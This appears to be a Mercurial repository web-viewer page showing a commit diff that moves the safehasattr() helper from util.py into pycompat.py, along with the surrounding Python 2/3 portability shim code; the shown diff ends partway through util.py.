##// END OF EJS Templates
util: make safehasattr() a pycompat function...
Yuya Nishihara -
r37117:6ca5f825 default
parent child Browse files
Show More
@@ -1,373 +1,380
1 # pycompat.py - portability shim for python 3
1 # pycompat.py - portability shim for python 3
2 #
2 #
3 # This software may be used and distributed according to the terms of the
3 # This software may be used and distributed according to the terms of the
4 # GNU General Public License version 2 or any later version.
4 # GNU General Public License version 2 or any later version.
5
5
6 """Mercurial portability shim for python 3.
6 """Mercurial portability shim for python 3.
7
7
8 This contains aliases to hide python version-specific details from the core.
8 This contains aliases to hide python version-specific details from the core.
9 """
9 """
10
10
11 from __future__ import absolute_import
11 from __future__ import absolute_import
12
12
13 import getopt
13 import getopt
14 import inspect
14 import inspect
15 import os
15 import os
16 import shlex
16 import shlex
17 import sys
17 import sys
18
18
19 ispy3 = (sys.version_info[0] >= 3)
19 ispy3 = (sys.version_info[0] >= 3)
20 ispypy = (r'__pypy__' in sys.builtin_module_names)
20 ispypy = (r'__pypy__' in sys.builtin_module_names)
21
21
22 if not ispy3:
22 if not ispy3:
23 import cookielib
23 import cookielib
24 import cPickle as pickle
24 import cPickle as pickle
25 import httplib
25 import httplib
26 import Queue as _queue
26 import Queue as _queue
27 import SocketServer as socketserver
27 import SocketServer as socketserver
28 import xmlrpclib
28 import xmlrpclib
29 else:
29 else:
30 import http.cookiejar as cookielib
30 import http.cookiejar as cookielib
31 import http.client as httplib
31 import http.client as httplib
32 import pickle
32 import pickle
33 import queue as _queue
33 import queue as _queue
34 import socketserver
34 import socketserver
35 import xmlrpc.client as xmlrpclib
35 import xmlrpc.client as xmlrpclib
36
36
37 empty = _queue.Empty
37 empty = _queue.Empty
38 queue = _queue.Queue
38 queue = _queue.Queue
39
39
40 def identity(a):
40 def identity(a):
41 return a
41 return a
42
42
43 if ispy3:
43 if ispy3:
44 import builtins
44 import builtins
45 import functools
45 import functools
46 import io
46 import io
47 import struct
47 import struct
48
48
49 fsencode = os.fsencode
49 fsencode = os.fsencode
50 fsdecode = os.fsdecode
50 fsdecode = os.fsdecode
51 oscurdir = os.curdir.encode('ascii')
51 oscurdir = os.curdir.encode('ascii')
52 oslinesep = os.linesep.encode('ascii')
52 oslinesep = os.linesep.encode('ascii')
53 osname = os.name.encode('ascii')
53 osname = os.name.encode('ascii')
54 ospathsep = os.pathsep.encode('ascii')
54 ospathsep = os.pathsep.encode('ascii')
55 ospardir = os.pardir.encode('ascii')
55 ospardir = os.pardir.encode('ascii')
56 ossep = os.sep.encode('ascii')
56 ossep = os.sep.encode('ascii')
57 osaltsep = os.altsep
57 osaltsep = os.altsep
58 if osaltsep:
58 if osaltsep:
59 osaltsep = osaltsep.encode('ascii')
59 osaltsep = osaltsep.encode('ascii')
60 # os.getcwd() on Python 3 returns string, but it has os.getcwdb() which
60 # os.getcwd() on Python 3 returns string, but it has os.getcwdb() which
61 # returns bytes.
61 # returns bytes.
62 getcwd = os.getcwdb
62 getcwd = os.getcwdb
63 sysplatform = sys.platform.encode('ascii')
63 sysplatform = sys.platform.encode('ascii')
64 sysexecutable = sys.executable
64 sysexecutable = sys.executable
65 if sysexecutable:
65 if sysexecutable:
66 sysexecutable = os.fsencode(sysexecutable)
66 sysexecutable = os.fsencode(sysexecutable)
67 bytesio = io.BytesIO
67 bytesio = io.BytesIO
68 # TODO deprecate stringio name, as it is a lie on Python 3.
68 # TODO deprecate stringio name, as it is a lie on Python 3.
69 stringio = bytesio
69 stringio = bytesio
70
70
71 def maplist(*args):
71 def maplist(*args):
72 return list(map(*args))
72 return list(map(*args))
73
73
74 def rangelist(*args):
74 def rangelist(*args):
75 return list(range(*args))
75 return list(range(*args))
76
76
77 def ziplist(*args):
77 def ziplist(*args):
78 return list(zip(*args))
78 return list(zip(*args))
79
79
80 rawinput = input
80 rawinput = input
81 getargspec = inspect.getfullargspec
81 getargspec = inspect.getfullargspec
82
82
83 # TODO: .buffer might not exist if std streams were replaced; we'll need
83 # TODO: .buffer might not exist if std streams were replaced; we'll need
84 # a silly wrapper to make a bytes stream backed by a unicode one.
84 # a silly wrapper to make a bytes stream backed by a unicode one.
85 stdin = sys.stdin.buffer
85 stdin = sys.stdin.buffer
86 stdout = sys.stdout.buffer
86 stdout = sys.stdout.buffer
87 stderr = sys.stderr.buffer
87 stderr = sys.stderr.buffer
88
88
89 # Since Python 3 converts argv to wchar_t type by Py_DecodeLocale() on Unix,
89 # Since Python 3 converts argv to wchar_t type by Py_DecodeLocale() on Unix,
90 # we can use os.fsencode() to get back bytes argv.
90 # we can use os.fsencode() to get back bytes argv.
91 #
91 #
92 # https://hg.python.org/cpython/file/v3.5.1/Programs/python.c#l55
92 # https://hg.python.org/cpython/file/v3.5.1/Programs/python.c#l55
93 #
93 #
94 # TODO: On Windows, the native argv is wchar_t, so we'll need a different
94 # TODO: On Windows, the native argv is wchar_t, so we'll need a different
95 # workaround to simulate the Python 2 (i.e. ANSI Win32 API) behavior.
95 # workaround to simulate the Python 2 (i.e. ANSI Win32 API) behavior.
96 if getattr(sys, 'argv', None) is not None:
96 if getattr(sys, 'argv', None) is not None:
97 sysargv = list(map(os.fsencode, sys.argv))
97 sysargv = list(map(os.fsencode, sys.argv))
98
98
99 bytechr = struct.Struct('>B').pack
99 bytechr = struct.Struct('>B').pack
100 byterepr = b'%r'.__mod__
100 byterepr = b'%r'.__mod__
101
101
102 class bytestr(bytes):
102 class bytestr(bytes):
103 """A bytes which mostly acts as a Python 2 str
103 """A bytes which mostly acts as a Python 2 str
104
104
105 >>> bytestr(), bytestr(bytearray(b'foo')), bytestr(u'ascii'), bytestr(1)
105 >>> bytestr(), bytestr(bytearray(b'foo')), bytestr(u'ascii'), bytestr(1)
106 ('', 'foo', 'ascii', '1')
106 ('', 'foo', 'ascii', '1')
107 >>> s = bytestr(b'foo')
107 >>> s = bytestr(b'foo')
108 >>> assert s is bytestr(s)
108 >>> assert s is bytestr(s)
109
109
110 __bytes__() should be called if provided:
110 __bytes__() should be called if provided:
111
111
112 >>> class bytesable(object):
112 >>> class bytesable(object):
113 ... def __bytes__(self):
113 ... def __bytes__(self):
114 ... return b'bytes'
114 ... return b'bytes'
115 >>> bytestr(bytesable())
115 >>> bytestr(bytesable())
116 'bytes'
116 'bytes'
117
117
118 There's no implicit conversion from non-ascii str as its encoding is
118 There's no implicit conversion from non-ascii str as its encoding is
119 unknown:
119 unknown:
120
120
121 >>> bytestr(chr(0x80)) # doctest: +ELLIPSIS
121 >>> bytestr(chr(0x80)) # doctest: +ELLIPSIS
122 Traceback (most recent call last):
122 Traceback (most recent call last):
123 ...
123 ...
124 UnicodeEncodeError: ...
124 UnicodeEncodeError: ...
125
125
126 Comparison between bytestr and bytes should work:
126 Comparison between bytestr and bytes should work:
127
127
128 >>> assert bytestr(b'foo') == b'foo'
128 >>> assert bytestr(b'foo') == b'foo'
129 >>> assert b'foo' == bytestr(b'foo')
129 >>> assert b'foo' == bytestr(b'foo')
130 >>> assert b'f' in bytestr(b'foo')
130 >>> assert b'f' in bytestr(b'foo')
131 >>> assert bytestr(b'f') in b'foo'
131 >>> assert bytestr(b'f') in b'foo'
132
132
133 Sliced elements should be bytes, not integer:
133 Sliced elements should be bytes, not integer:
134
134
135 >>> s[1], s[:2]
135 >>> s[1], s[:2]
136 (b'o', b'fo')
136 (b'o', b'fo')
137 >>> list(s), list(reversed(s))
137 >>> list(s), list(reversed(s))
138 ([b'f', b'o', b'o'], [b'o', b'o', b'f'])
138 ([b'f', b'o', b'o'], [b'o', b'o', b'f'])
139
139
140 As bytestr type isn't propagated across operations, you need to cast
140 As bytestr type isn't propagated across operations, you need to cast
141 bytes to bytestr explicitly:
141 bytes to bytestr explicitly:
142
142
143 >>> s = bytestr(b'foo').upper()
143 >>> s = bytestr(b'foo').upper()
144 >>> t = bytestr(s)
144 >>> t = bytestr(s)
145 >>> s[0], t[0]
145 >>> s[0], t[0]
146 (70, b'F')
146 (70, b'F')
147
147
148 Be careful to not pass a bytestr object to a function which expects
148 Be careful to not pass a bytestr object to a function which expects
149 bytearray-like behavior.
149 bytearray-like behavior.
150
150
151 >>> t = bytes(t) # cast to bytes
151 >>> t = bytes(t) # cast to bytes
152 >>> assert type(t) is bytes
152 >>> assert type(t) is bytes
153 """
153 """
154
154
155 def __new__(cls, s=b''):
155 def __new__(cls, s=b''):
156 if isinstance(s, bytestr):
156 if isinstance(s, bytestr):
157 return s
157 return s
158 if (not isinstance(s, (bytes, bytearray))
158 if (not isinstance(s, (bytes, bytearray))
159 and not hasattr(s, u'__bytes__')): # hasattr-py3-only
159 and not hasattr(s, u'__bytes__')): # hasattr-py3-only
160 s = str(s).encode(u'ascii')
160 s = str(s).encode(u'ascii')
161 return bytes.__new__(cls, s)
161 return bytes.__new__(cls, s)
162
162
163 def __getitem__(self, key):
163 def __getitem__(self, key):
164 s = bytes.__getitem__(self, key)
164 s = bytes.__getitem__(self, key)
165 if not isinstance(s, bytes):
165 if not isinstance(s, bytes):
166 s = bytechr(s)
166 s = bytechr(s)
167 return s
167 return s
168
168
169 def __iter__(self):
169 def __iter__(self):
170 return iterbytestr(bytes.__iter__(self))
170 return iterbytestr(bytes.__iter__(self))
171
171
172 def __repr__(self):
172 def __repr__(self):
173 return bytes.__repr__(self)[1:] # drop b''
173 return bytes.__repr__(self)[1:] # drop b''
174
174
175 def iterbytestr(s):
175 def iterbytestr(s):
176 """Iterate bytes as if it were a str object of Python 2"""
176 """Iterate bytes as if it were a str object of Python 2"""
177 return map(bytechr, s)
177 return map(bytechr, s)
178
178
179 def maybebytestr(s):
179 def maybebytestr(s):
180 """Promote bytes to bytestr"""
180 """Promote bytes to bytestr"""
181 if isinstance(s, bytes):
181 if isinstance(s, bytes):
182 return bytestr(s)
182 return bytestr(s)
183 return s
183 return s
184
184
185 def sysbytes(s):
185 def sysbytes(s):
186 """Convert an internal str (e.g. keyword, __doc__) back to bytes
186 """Convert an internal str (e.g. keyword, __doc__) back to bytes
187
187
188 This never raises UnicodeEncodeError, but only ASCII characters
188 This never raises UnicodeEncodeError, but only ASCII characters
189 can be round-trip by sysstr(sysbytes(s)).
189 can be round-trip by sysstr(sysbytes(s)).
190 """
190 """
191 return s.encode(u'utf-8')
191 return s.encode(u'utf-8')
192
192
193 def sysstr(s):
193 def sysstr(s):
194 """Return a keyword str to be passed to Python functions such as
194 """Return a keyword str to be passed to Python functions such as
195 getattr() and str.encode()
195 getattr() and str.encode()
196
196
197 This never raises UnicodeDecodeError. Non-ascii characters are
197 This never raises UnicodeDecodeError. Non-ascii characters are
198 considered invalid and mapped to arbitrary but unique code points
198 considered invalid and mapped to arbitrary but unique code points
199 such that 'sysstr(a) != sysstr(b)' for all 'a != b'.
199 such that 'sysstr(a) != sysstr(b)' for all 'a != b'.
200 """
200 """
201 if isinstance(s, builtins.str):
201 if isinstance(s, builtins.str):
202 return s
202 return s
203 return s.decode(u'latin-1')
203 return s.decode(u'latin-1')
204
204
205 def strurl(url):
205 def strurl(url):
206 """Converts a bytes url back to str"""
206 """Converts a bytes url back to str"""
207 if isinstance(url, bytes):
207 if isinstance(url, bytes):
208 return url.decode(u'ascii')
208 return url.decode(u'ascii')
209 return url
209 return url
210
210
211 def bytesurl(url):
211 def bytesurl(url):
212 """Converts a str url to bytes by encoding in ascii"""
212 """Converts a str url to bytes by encoding in ascii"""
213 if isinstance(url, str):
213 if isinstance(url, str):
214 return url.encode(u'ascii')
214 return url.encode(u'ascii')
215 return url
215 return url
216
216
217 def raisewithtb(exc, tb):
217 def raisewithtb(exc, tb):
218 """Raise exception with the given traceback"""
218 """Raise exception with the given traceback"""
219 raise exc.with_traceback(tb)
219 raise exc.with_traceback(tb)
220
220
221 def getdoc(obj):
221 def getdoc(obj):
222 """Get docstring as bytes; may be None so gettext() won't confuse it
222 """Get docstring as bytes; may be None so gettext() won't confuse it
223 with _('')"""
223 with _('')"""
224 doc = getattr(obj, u'__doc__', None)
224 doc = getattr(obj, u'__doc__', None)
225 if doc is None:
225 if doc is None:
226 return doc
226 return doc
227 return sysbytes(doc)
227 return sysbytes(doc)
228
228
229 def _wrapattrfunc(f):
229 def _wrapattrfunc(f):
230 @functools.wraps(f)
230 @functools.wraps(f)
231 def w(object, name, *args):
231 def w(object, name, *args):
232 return f(object, sysstr(name), *args)
232 return f(object, sysstr(name), *args)
233 return w
233 return w
234
234
235 # these wrappers are automagically imported by hgloader
235 # these wrappers are automagically imported by hgloader
236 delattr = _wrapattrfunc(builtins.delattr)
236 delattr = _wrapattrfunc(builtins.delattr)
237 getattr = _wrapattrfunc(builtins.getattr)
237 getattr = _wrapattrfunc(builtins.getattr)
238 hasattr = _wrapattrfunc(builtins.hasattr)
238 hasattr = _wrapattrfunc(builtins.hasattr)
239 setattr = _wrapattrfunc(builtins.setattr)
239 setattr = _wrapattrfunc(builtins.setattr)
240 xrange = builtins.range
240 xrange = builtins.range
241 unicode = str
241 unicode = str
242
242
243 def open(name, mode='r', buffering=-1, encoding=None):
243 def open(name, mode='r', buffering=-1, encoding=None):
244 return builtins.open(name, sysstr(mode), buffering, encoding)
244 return builtins.open(name, sysstr(mode), buffering, encoding)
245
245
246 safehasattr = _wrapattrfunc(builtins.hasattr)
247
246 def _getoptbwrapper(orig, args, shortlist, namelist):
248 def _getoptbwrapper(orig, args, shortlist, namelist):
247 """
249 """
248 Takes bytes arguments, converts them to unicode, pass them to
250 Takes bytes arguments, converts them to unicode, pass them to
249 getopt.getopt(), convert the returned values back to bytes and then
251 getopt.getopt(), convert the returned values back to bytes and then
250 return them for Python 3 compatibility as getopt.getopt() don't accepts
252 return them for Python 3 compatibility as getopt.getopt() don't accepts
251 bytes on Python 3.
253 bytes on Python 3.
252 """
254 """
253 args = [a.decode('latin-1') for a in args]
255 args = [a.decode('latin-1') for a in args]
254 shortlist = shortlist.decode('latin-1')
256 shortlist = shortlist.decode('latin-1')
255 namelist = [a.decode('latin-1') for a in namelist]
257 namelist = [a.decode('latin-1') for a in namelist]
256 opts, args = orig(args, shortlist, namelist)
258 opts, args = orig(args, shortlist, namelist)
257 opts = [(a[0].encode('latin-1'), a[1].encode('latin-1'))
259 opts = [(a[0].encode('latin-1'), a[1].encode('latin-1'))
258 for a in opts]
260 for a in opts]
259 args = [a.encode('latin-1') for a in args]
261 args = [a.encode('latin-1') for a in args]
260 return opts, args
262 return opts, args
261
263
262 def strkwargs(dic):
264 def strkwargs(dic):
263 """
265 """
264 Converts the keys of a python dictonary to str i.e. unicodes so that
266 Converts the keys of a python dictonary to str i.e. unicodes so that
265 they can be passed as keyword arguments as dictonaries with bytes keys
267 they can be passed as keyword arguments as dictonaries with bytes keys
266 can't be passed as keyword arguments to functions on Python 3.
268 can't be passed as keyword arguments to functions on Python 3.
267 """
269 """
268 dic = dict((k.decode('latin-1'), v) for k, v in dic.iteritems())
270 dic = dict((k.decode('latin-1'), v) for k, v in dic.iteritems())
269 return dic
271 return dic
270
272
271 def byteskwargs(dic):
273 def byteskwargs(dic):
272 """
274 """
273 Converts keys of python dictonaries to bytes as they were converted to
275 Converts keys of python dictonaries to bytes as they were converted to
274 str to pass that dictonary as a keyword argument on Python 3.
276 str to pass that dictonary as a keyword argument on Python 3.
275 """
277 """
276 dic = dict((k.encode('latin-1'), v) for k, v in dic.iteritems())
278 dic = dict((k.encode('latin-1'), v) for k, v in dic.iteritems())
277 return dic
279 return dic
278
280
279 # TODO: handle shlex.shlex().
281 # TODO: handle shlex.shlex().
280 def shlexsplit(s, comments=False, posix=True):
282 def shlexsplit(s, comments=False, posix=True):
281 """
283 """
282 Takes bytes argument, convert it to str i.e. unicodes, pass that into
284 Takes bytes argument, convert it to str i.e. unicodes, pass that into
283 shlex.split(), convert the returned value to bytes and return that for
285 shlex.split(), convert the returned value to bytes and return that for
284 Python 3 compatibility as shelx.split() don't accept bytes on Python 3.
286 Python 3 compatibility as shelx.split() don't accept bytes on Python 3.
285 """
287 """
286 ret = shlex.split(s.decode('latin-1'), comments, posix)
288 ret = shlex.split(s.decode('latin-1'), comments, posix)
287 return [a.encode('latin-1') for a in ret]
289 return [a.encode('latin-1') for a in ret]
288
290
289 def emailparser(*args, **kwargs):
291 def emailparser(*args, **kwargs):
290 import email.parser
292 import email.parser
291 return email.parser.BytesParser(*args, **kwargs)
293 return email.parser.BytesParser(*args, **kwargs)
292
294
293 else:
295 else:
294 import cStringIO
296 import cStringIO
295
297
296 bytechr = chr
298 bytechr = chr
297 byterepr = repr
299 byterepr = repr
298 bytestr = str
300 bytestr = str
299 iterbytestr = iter
301 iterbytestr = iter
300 maybebytestr = identity
302 maybebytestr = identity
301 sysbytes = identity
303 sysbytes = identity
302 sysstr = identity
304 sysstr = identity
303 strurl = identity
305 strurl = identity
304 bytesurl = identity
306 bytesurl = identity
305
307
306 # this can't be parsed on Python 3
308 # this can't be parsed on Python 3
307 exec('def raisewithtb(exc, tb):\n'
309 exec('def raisewithtb(exc, tb):\n'
308 ' raise exc, None, tb\n')
310 ' raise exc, None, tb\n')
309
311
310 def fsencode(filename):
312 def fsencode(filename):
311 """
313 """
312 Partial backport from os.py in Python 3, which only accepts bytes.
314 Partial backport from os.py in Python 3, which only accepts bytes.
313 In Python 2, our paths should only ever be bytes, a unicode path
315 In Python 2, our paths should only ever be bytes, a unicode path
314 indicates a bug.
316 indicates a bug.
315 """
317 """
316 if isinstance(filename, str):
318 if isinstance(filename, str):
317 return filename
319 return filename
318 else:
320 else:
319 raise TypeError(
321 raise TypeError(
320 "expect str, not %s" % type(filename).__name__)
322 "expect str, not %s" % type(filename).__name__)
321
323
322 # In Python 2, fsdecode() has a very chance to receive bytes. So it's
324 # In Python 2, fsdecode() has a very chance to receive bytes. So it's
323 # better not to touch Python 2 part as it's already working fine.
325 # better not to touch Python 2 part as it's already working fine.
324 fsdecode = identity
326 fsdecode = identity
325
327
326 def getdoc(obj):
328 def getdoc(obj):
327 return getattr(obj, '__doc__', None)
329 return getattr(obj, '__doc__', None)
328
330
331 _notset = object()
332
333 def safehasattr(thing, attr):
334 return getattr(thing, attr, _notset) is not _notset
335
329 def _getoptbwrapper(orig, args, shortlist, namelist):
336 def _getoptbwrapper(orig, args, shortlist, namelist):
330 return orig(args, shortlist, namelist)
337 return orig(args, shortlist, namelist)
331
338
332 strkwargs = identity
339 strkwargs = identity
333 byteskwargs = identity
340 byteskwargs = identity
334
341
335 oscurdir = os.curdir
342 oscurdir = os.curdir
336 oslinesep = os.linesep
343 oslinesep = os.linesep
337 osname = os.name
344 osname = os.name
338 ospathsep = os.pathsep
345 ospathsep = os.pathsep
339 ospardir = os.pardir
346 ospardir = os.pardir
340 ossep = os.sep
347 ossep = os.sep
341 osaltsep = os.altsep
348 osaltsep = os.altsep
342 stdin = sys.stdin
349 stdin = sys.stdin
343 stdout = sys.stdout
350 stdout = sys.stdout
344 stderr = sys.stderr
351 stderr = sys.stderr
345 if getattr(sys, 'argv', None) is not None:
352 if getattr(sys, 'argv', None) is not None:
346 sysargv = sys.argv
353 sysargv = sys.argv
347 sysplatform = sys.platform
354 sysplatform = sys.platform
348 getcwd = os.getcwd
355 getcwd = os.getcwd
349 sysexecutable = sys.executable
356 sysexecutable = sys.executable
350 shlexsplit = shlex.split
357 shlexsplit = shlex.split
351 bytesio = cStringIO.StringIO
358 bytesio = cStringIO.StringIO
352 stringio = bytesio
359 stringio = bytesio
353 maplist = map
360 maplist = map
354 rangelist = range
361 rangelist = range
355 ziplist = zip
362 ziplist = zip
356 rawinput = raw_input
363 rawinput = raw_input
357 getargspec = inspect.getargspec
364 getargspec = inspect.getargspec
358
365
359 def emailparser(*args, **kwargs):
366 def emailparser(*args, **kwargs):
360 import email.parser
367 import email.parser
361 return email.parser.Parser(*args, **kwargs)
368 return email.parser.Parser(*args, **kwargs)
362
369
363 isjython = sysplatform.startswith('java')
370 isjython = sysplatform.startswith('java')
364
371
365 isdarwin = sysplatform == 'darwin'
372 isdarwin = sysplatform == 'darwin'
366 isposix = osname == 'posix'
373 isposix = osname == 'posix'
367 iswindows = osname == 'nt'
374 iswindows = osname == 'nt'
368
375
369 def getoptb(args, shortlist, namelist):
376 def getoptb(args, shortlist, namelist):
370 return _getoptbwrapper(getopt.getopt, args, shortlist, namelist)
377 return _getoptbwrapper(getopt.getopt, args, shortlist, namelist)
371
378
372 def gnugetoptb(args, shortlist, namelist):
379 def gnugetoptb(args, shortlist, namelist):
373 return _getoptbwrapper(getopt.gnu_getopt, args, shortlist, namelist)
380 return _getoptbwrapper(getopt.gnu_getopt, args, shortlist, namelist)
@@ -1,4092 +1,4090
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import collections
20 import collections
21 import contextlib
21 import contextlib
22 import errno
22 import errno
23 import gc
23 import gc
24 import hashlib
24 import hashlib
25 import imp
25 import imp
26 import io
26 import io
27 import itertools
27 import itertools
28 import mmap
28 import mmap
29 import os
29 import os
30 import platform as pyplatform
30 import platform as pyplatform
31 import re as remod
31 import re as remod
32 import shutil
32 import shutil
33 import signal
33 import signal
34 import socket
34 import socket
35 import stat
35 import stat
36 import subprocess
36 import subprocess
37 import sys
37 import sys
38 import tempfile
38 import tempfile
39 import time
39 import time
40 import traceback
40 import traceback
41 import warnings
41 import warnings
42 import zlib
42 import zlib
43
43
44 from . import (
44 from . import (
45 encoding,
45 encoding,
46 error,
46 error,
47 i18n,
47 i18n,
48 node as nodemod,
48 node as nodemod,
49 policy,
49 policy,
50 pycompat,
50 pycompat,
51 urllibcompat,
51 urllibcompat,
52 )
52 )
53 from .utils import (
53 from .utils import (
54 dateutil,
54 dateutil,
55 stringutil,
55 stringutil,
56 )
56 )
57
57
58 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
61
61
62 b85decode = base85.b85decode
62 b85decode = base85.b85decode
63 b85encode = base85.b85encode
63 b85encode = base85.b85encode
64
64
65 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
66 empty = pycompat.empty
66 empty = pycompat.empty
67 httplib = pycompat.httplib
67 httplib = pycompat.httplib
68 pickle = pycompat.pickle
68 pickle = pycompat.pickle
69 queue = pycompat.queue
69 queue = pycompat.queue
70 safehasattr = pycompat.safehasattr
70 socketserver = pycompat.socketserver
71 socketserver = pycompat.socketserver
71 stderr = pycompat.stderr
72 stderr = pycompat.stderr
72 stdin = pycompat.stdin
73 stdin = pycompat.stdin
73 stdout = pycompat.stdout
74 stdout = pycompat.stdout
74 bytesio = pycompat.bytesio
75 bytesio = pycompat.bytesio
75 # TODO deprecate stringio name, as it is a lie on Python 3.
76 # TODO deprecate stringio name, as it is a lie on Python 3.
76 stringio = bytesio
77 stringio = bytesio
77 xmlrpclib = pycompat.xmlrpclib
78 xmlrpclib = pycompat.xmlrpclib
78
79
79 httpserver = urllibcompat.httpserver
80 httpserver = urllibcompat.httpserver
80 urlerr = urllibcompat.urlerr
81 urlerr = urllibcompat.urlerr
81 urlreq = urllibcompat.urlreq
82 urlreq = urllibcompat.urlreq
82
83
83 # workaround for win32mbcs
84 # workaround for win32mbcs
84 _filenamebytestr = pycompat.bytestr
85 _filenamebytestr = pycompat.bytestr
85
86
86 def isatty(fp):
87 def isatty(fp):
87 try:
88 try:
88 return fp.isatty()
89 return fp.isatty()
89 except AttributeError:
90 except AttributeError:
90 return False
91 return False
91
92
92 # glibc determines buffering on first write to stdout - if we replace a TTY
93 # glibc determines buffering on first write to stdout - if we replace a TTY
93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
94 # destined stdout with a pipe destined stdout (e.g. pager), we want line
94 # buffering
95 # buffering
95 if isatty(stdout):
96 if isatty(stdout):
96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
97 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
97
98
98 if pycompat.iswindows:
99 if pycompat.iswindows:
99 from . import windows as platform
100 from . import windows as platform
100 stdout = platform.winstdout(stdout)
101 stdout = platform.winstdout(stdout)
101 else:
102 else:
102 from . import posix as platform
103 from . import posix as platform
103
104
104 _ = i18n._
105 _ = i18n._
105
106
106 bindunixsocket = platform.bindunixsocket
107 bindunixsocket = platform.bindunixsocket
107 cachestat = platform.cachestat
108 cachestat = platform.cachestat
108 checkexec = platform.checkexec
109 checkexec = platform.checkexec
109 checklink = platform.checklink
110 checklink = platform.checklink
110 copymode = platform.copymode
111 copymode = platform.copymode
111 expandglobs = platform.expandglobs
112 expandglobs = platform.expandglobs
112 explainexit = platform.explainexit
113 explainexit = platform.explainexit
113 findexe = platform.findexe
114 findexe = platform.findexe
114 getfsmountpoint = platform.getfsmountpoint
115 getfsmountpoint = platform.getfsmountpoint
115 getfstype = platform.getfstype
116 getfstype = platform.getfstype
116 gethgcmd = platform.gethgcmd
117 gethgcmd = platform.gethgcmd
117 getuser = platform.getuser
118 getuser = platform.getuser
118 getpid = os.getpid
119 getpid = os.getpid
119 groupmembers = platform.groupmembers
120 groupmembers = platform.groupmembers
120 groupname = platform.groupname
121 groupname = platform.groupname
121 hidewindow = platform.hidewindow
122 hidewindow = platform.hidewindow
122 isexec = platform.isexec
123 isexec = platform.isexec
123 isowner = platform.isowner
124 isowner = platform.isowner
124 listdir = osutil.listdir
125 listdir = osutil.listdir
125 localpath = platform.localpath
126 localpath = platform.localpath
126 lookupreg = platform.lookupreg
127 lookupreg = platform.lookupreg
127 makedir = platform.makedir
128 makedir = platform.makedir
128 nlinks = platform.nlinks
129 nlinks = platform.nlinks
129 normpath = platform.normpath
130 normpath = platform.normpath
130 normcase = platform.normcase
131 normcase = platform.normcase
131 normcasespec = platform.normcasespec
132 normcasespec = platform.normcasespec
132 normcasefallback = platform.normcasefallback
133 normcasefallback = platform.normcasefallback
133 openhardlinks = platform.openhardlinks
134 openhardlinks = platform.openhardlinks
134 oslink = platform.oslink
135 oslink = platform.oslink
135 parsepatchoutput = platform.parsepatchoutput
136 parsepatchoutput = platform.parsepatchoutput
136 pconvert = platform.pconvert
137 pconvert = platform.pconvert
137 poll = platform.poll
138 poll = platform.poll
138 popen = platform.popen
139 popen = platform.popen
139 posixfile = platform.posixfile
140 posixfile = platform.posixfile
140 quotecommand = platform.quotecommand
141 quotecommand = platform.quotecommand
141 readpipe = platform.readpipe
142 readpipe = platform.readpipe
142 rename = platform.rename
143 rename = platform.rename
143 removedirs = platform.removedirs
144 removedirs = platform.removedirs
144 samedevice = platform.samedevice
145 samedevice = platform.samedevice
145 samefile = platform.samefile
146 samefile = platform.samefile
146 samestat = platform.samestat
147 samestat = platform.samestat
147 setbinary = platform.setbinary
148 setbinary = platform.setbinary
148 setflags = platform.setflags
149 setflags = platform.setflags
149 setsignalhandler = platform.setsignalhandler
150 setsignalhandler = platform.setsignalhandler
150 shellquote = platform.shellquote
151 shellquote = platform.shellquote
151 shellsplit = platform.shellsplit
152 shellsplit = platform.shellsplit
152 spawndetached = platform.spawndetached
153 spawndetached = platform.spawndetached
153 split = platform.split
154 split = platform.split
154 sshargs = platform.sshargs
155 sshargs = platform.sshargs
155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
156 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
156 statisexec = platform.statisexec
157 statisexec = platform.statisexec
157 statislink = platform.statislink
158 statislink = platform.statislink
158 testpid = platform.testpid
159 testpid = platform.testpid
159 umask = platform.umask
160 umask = platform.umask
160 unlink = platform.unlink
161 unlink = platform.unlink
161 username = platform.username
162 username = platform.username
162
163
163 try:
164 try:
164 recvfds = osutil.recvfds
165 recvfds = osutil.recvfds
165 except AttributeError:
166 except AttributeError:
166 pass
167 pass
167 try:
168 try:
168 setprocname = osutil.setprocname
169 setprocname = osutil.setprocname
169 except AttributeError:
170 except AttributeError:
170 pass
171 pass
171 try:
172 try:
172 unblocksignal = osutil.unblocksignal
173 unblocksignal = osutil.unblocksignal
173 except AttributeError:
174 except AttributeError:
174 pass
175 pass
175
176
176 # Python compatibility
177 # Python compatibility
177
178
178 _notset = object()
179 _notset = object()
179
180
180 def safehasattr(thing, attr):
181 return getattr(thing, attr, _notset) is not _notset
182
183 def _rapply(f, xs):
181 def _rapply(f, xs):
184 if xs is None:
182 if xs is None:
185 # assume None means non-value of optional data
183 # assume None means non-value of optional data
186 return xs
184 return xs
187 if isinstance(xs, (list, set, tuple)):
185 if isinstance(xs, (list, set, tuple)):
188 return type(xs)(_rapply(f, x) for x in xs)
186 return type(xs)(_rapply(f, x) for x in xs)
189 if isinstance(xs, dict):
187 if isinstance(xs, dict):
190 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
